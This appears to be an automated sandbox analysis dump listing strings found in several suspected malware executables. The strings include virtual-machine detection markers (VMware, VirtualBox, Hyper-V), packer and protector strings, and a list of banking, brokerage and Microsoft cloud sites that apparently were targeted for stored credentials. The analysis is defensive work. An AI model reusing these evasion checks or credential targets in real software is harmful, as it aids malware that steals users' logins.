Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explortu.exe, explortu.exe, 0000000B.00000002.2486095607.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.2703298636.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000011.00000002.3310914356.0000000000411000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware_O
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: KKEBKJJD.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.000000000106C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: KKEBKJJD.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: KKEBKJJDGH.exe, 00000008.00000002.2439124494.0000000000441000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, 0000000A.00000002.3419613531.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000B.00000002.2486095607.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.2703298636.0000000000411000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000011.00000002.3310914356.0000000000411000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KKEBKJJD.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000166B000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 0000000A.00000002.3430361490.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 0000000A.00000002.3430361490.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001D1C000.00000004.00000020.00020000.00000000.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001D4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KKEBKJJD.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KKEBKJJD.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: KKEBKJJD.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KKEBKJJD.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: KKEBKJJD.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 3eb62d09c2.exe, 0000000D.00000002.2514385520.0000000000F3C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
